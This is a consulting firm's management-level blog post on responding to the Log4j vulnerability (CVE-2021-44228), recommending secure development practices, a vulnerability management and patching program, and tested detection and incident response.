What’s That Coming Over The Hill is it a Monster?
A guide for senior management in response to the Log4j critical vulnerability
Just like in the lyrics of the song Monster by the band the Automatic the answer is a resounding yes in the shape of the Log4j critical vulnerabilities. Most IT and Infosec teams will still be battling their way through identification, mitigation and long term patching activities. These could last for many weeks and come as a real distraction when businesses would rather focus on growth priorities for 2022. Now there will be those of you reading this thinking what’s the fuss? I have not seen any major data breaches reported in the media so far. Is this just another over hyped cyber scare? I will leave you to reach your own conclusions. CheckPoint has reported monitoring over 100 attacks every minute against at-risk assets susceptible to this critical vulnerability (CVE 2021-44228) so I strongly urge you to take appropriate precautions to protect your business.
So in the famous words of Winston Churchill ‘Never let a good crisis go to waste’, what must senior managers understand to help in their decision making to guide their response to this evolving and significant threat?
Firstly software vendors and internal development teams are prioritised to develop good and not always secure code. If Apache had implemented OWASP Top 10 best practise this whole incident could have been easily avoided. The first takeaway therefore is to go and check that your vendors and internal development teams are following OWASP development best practises and ensure appropriate security testing processes are in place.
Secondly there is the dreaded subject of security patching which is a significant and little understood challenge for IT teams. Security patching is paramount in this digital age, but it’s not always foremost in the minds of busy admins and developers. Security patching should be performed routinely to keep business systems and the data they process secure and running smoothly. To achieve this, patching should be planned for, appropriately resourced and automated where possible as part of the application life cycle management process. Various regulations such as Cyber Essentials, GDPR and PCI DSS all require supported and patched hardware and software. The US-CERT Vulnerability database recorded 18,376 vulnerabilities in 2021, the highest ever, with Redscan Labs analysis showing 90% of all of these CVEs requiring little technical skills by attackers to exploit. The second takeaway then is to implement a vulnerability management program for your business. To achieve this patching SLA’s and clear roles and responsibilities must be defined, a vulnerability scanning platform implemented that can provide both the detail needed by technical specialists and a vulnerability priority rating with good reporting capabilities to help inform management decision making, concerning risk versus the cost of patching. Few companies can afford to have every vulnerability fully patched and so effective risk management is essential.
Thirdly, how confident are you in your company’s threat detection and incident response capabilities? 2021 has seen a record increase in the number of major zero day threats that are often exploited before, or soon after being publicly disclosed. In such situations you have to survive for a period of time before patches are made available and you will have to rely on your security in depth controls and your ability to detect and contain any attacks until a long term solution arrives. The final takeaway is for you to ask those responsible for cyber security in your company what detection rules are in place for cyber threats, have these been recently tested, do they have a major incident response plan and when was the last tabletop exercise performed?
Mondas Consulting provides specialist support and services in all of these areas so please get in touch if you require further assistance.